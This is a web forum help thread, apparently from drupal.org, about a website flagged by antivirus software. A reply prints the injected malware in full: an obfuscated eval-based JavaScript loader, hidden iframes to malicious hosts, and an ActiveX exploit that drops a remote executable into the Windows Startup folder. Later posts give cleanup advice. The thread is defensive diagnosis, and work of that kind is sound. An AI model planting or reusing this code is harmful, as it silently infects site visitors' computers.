AntiVirus Software reporting a virus on my site
Hello,
I have a few readers who are reporting that their antivirus software (AVG Paid version for about 4 complaints, and Norton Antivirus for one) is not letting them load my web site, which is rvadventuremag.com if anyone cares to look. It's hard to get specific information from these folks because they're generally not technical, and just rely on their antivirus software without question.
Anyway, I was able to get one person to tell me that the AVG program was reporting that my site had a program called "WebAttacker" running. I have found out a little bit about web attacker; that it attaches itself by using javascript to open an iframe, and directs to another site in that way. My site does indeed use iframes where they're needed, but nothing I haven't set up and hand coded myself.
I'm at a bit of a loss right now. I haven't been able to get AVG or Norton to respond to me in any way, so I'm getting no help there. I was just wondering if anyone else had experienced the same problem and been able to successfully identify and resolve it.
Thanks
Confirmed
Right after the body tag you have the following snippet of code:
<script language=JavaScript>function ttbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,48,16,4,32,56,33,28,35,40,0,0,0,0,0,0,42,18,39,0,1,46,55,62,3,29,34,25,59,38,23,36,43,11,12,24,30,19,37,57,53,31,13,0,0,0,0,8,0,52,21,58,60,15,17,14,61,54,49,45,22,6,10,26,47,5,50,41,2,9,7,27,51,20,44);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(148^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}ttbnb25('8FpG1p05cTg5XHT5BBcz2ppGjeLP1p0h6BYdcHEE8wT04vepxJo0rwThWvekcNYGjBo9jHc9konkBwGhsoQ04HgWEELE8TgWjvedcipGrp0E4pL@xGwiXHg0coGG6PeddMIh4xpEMNpG1pYGdiPpVgnPOrop0gw9jHc9kocz0gPkagT01Hg0soosMAQ0jF0ddHT@ztnkBHTL5vY@itY0BUgGXFEPcppGjwP@9Ew0rwThWvp@xiQ')</script><!-- hiddenmesa.com -->It decodes to:
window.status='Done';document.write('<iframe name=5e4792 src="http://7speed.info/t/?'+Math.round(Math.random()*17808)+'5e4792'+'" width=212 height=84 style="display:none"></iframe>')Which fetches the attack vectors from 7speed.info via a number of iframes:
<iframe src=http://mysexydreams.net/img/stat/jam.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://209.160.67.56/va.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://ffseik.com/sss/in.cgi?14 width=1 height=1 style="display:none"></iframe>
va.php fetches:
<iframe src=http://papampam.net/in.cgi?pipka2 width=1 height=1 style="display:none"></iframe>
and this fetches:
<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="attack"></object>
<script>
var arbitrary_file = "http://portulote.com/cache/load.php";
var destination = 'c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsers.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src="pdf.php" type="application/pdf" width=100 height=100></embed>
--
The Manual | Troubleshooting FAQ | Tips for posting | How to report a security issue.
XSS cross site scripting Malware
I have the same issue and recently posted it here. We still cant find out how it got there, how to remove it and how to stop it from reoccureing. http://drupal.org/node/354237
Re;AntiVirus Software reporting a virus on my site
Search your web site and all of your web sites if you have more than one for any login and index files including php and htm or html this includes any webalizer folders as well.
Remove the code from all the infected pages.
Search your web site and all of your web sites if you have more than one for any folders that you did not place on your web site such as a folder ie. (ihetc) or any folders without a normal name, if you find any, remove them, if you have trouble removing them contact your hosting company and have them remove them.
Now the most important part change your control panel password if you have a control panel and change your FTP password and change them often on a regular bases.
All my web sites was infected in December 2008 with the same type of code and it took me awhile to fix the problems. I think the folders reinstall the code back one the pages.
I kept deleting the code and it kept coming back till I removed the folders.
One folder on one web site I had to have my hosting company remove the folder for me.
Keep an eye on your web site or web sites for awhile.
I do not know what the code does other than directs to the 7speed site as I keep anti-virus on my computer running all the time and don't want to take a chance without it.
Rick